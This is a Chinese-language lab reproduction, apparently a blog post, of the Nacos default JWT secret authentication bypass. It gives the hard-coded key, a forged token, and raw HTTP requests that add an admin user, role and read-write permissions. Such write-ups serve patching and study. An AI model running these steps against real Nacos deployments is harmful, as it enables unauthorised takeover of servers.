漏洞描述

开源服务管理平台 Nacos 中存在身份认证绕过漏洞，在默认配置下未对 token.secret.key 进行修改，导致远程攻击者可以绕过密钥认证进入后台，造成系统受控等后果。

影响版本

0.1.0 <= Nacos <= 2.2.0

漏洞复现

nacos有个默认用户名密码nacos|nacos，登陆时进行抓包，查看它的accessToken

eyJhbGciOiJIUzI1NiJ9.eyJzdWIiOiJuYWNvcyIsImV4cCI6MTY4MDUwNjE0Mn0.jffxPzwqSN96xXYS0qVk25wXZMKpTQGtlLK6abzDCQ4

然后对这个Token进行jwt解密：https://jwt.io/

解密出来sub就是用户名，exp是时间戳

我们可以通过nacos默认的token.secret.key密钥重新生成一个万能的token

SecretKey012345678901234567890123456789012345678901234567890123456789

时间戳可以任意选一个，比如我选择明年的4月3号，然后进行时间戳转换：1712111014

然后生成token

eyJhbGciOiJIUzI1NiJ9.eyJzdWIiOiJuYWNvcyIsImV4cCI6MTcxMjExMTAxNH0.u5T6RG8yw6KyLVxHDW2DPey4nCNRHBdeHZe0So8puE0

然后可以调用用户注册的api尝试添加用户，不知道为什么burp有点问题

POST /nacos/v1/auth/users HTTP/1.1
Host: 192.168.44.138:8848
Cache-Control: max-age=0
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/111.0.0.0 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Authorization: Bearer eyJhbGciOiJIUzI1NiJ9.eyJzdWIiOiJuYWNvcyIsImV4cCI6MTcxMjExMTAxNH0.u5T6RG8yw6KyLVxHDW2DPey4nCNRHBdeHZe0So8puE0
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
If-Modified-Since: Mon, 02 Nov 2020 11:10:29 GMT
Connection: close
Content-Length: 35

username=anhunsec&password=anhunsec

然后就直接用hackbar插件去构造post传参，然后添加成功

然后登陆进去以后发现没有权限认证

我们继续把他添加到用户组就行,还是继续用hackbar

http://192.168.44.138:8848/nacos/v1/auth/roles

post传参：role=anhunsec&username=anhunsec

加上haed头：
Authorization: Bearer eyJhbGciOiJIUzI1NiJ9.eyJzdWIiOiJuYWNvcyIsImV4cCI6MTcxMjExMTAxNH0.u5T6RG8yw6KyLVxHDW2DPey4nCNRHBdeHZe0So8puE0

然后给他一个public权限

http://192.168.44.138:8848/nacos/v1/auth/permissions

post传参：role=anhunsec&resource=:*:*&action=rw

加上haed头：
Authorization: Bearer eyJhbGciOiJIUzI1NiJ9.eyJzdWIiOiJuYWNvcyIsImV4cCI6MTcxMjExMTAxNH0.u5T6RG8yw6KyLVxHDW2DPey4nCNRHBdeHZe0So8puE0

登陆一下就可以了。当然也可以用它来修改nacos的密码

总结

漏洞原因是因为key写在了application.properties中，通过伪造JWT可以进行未授权操作。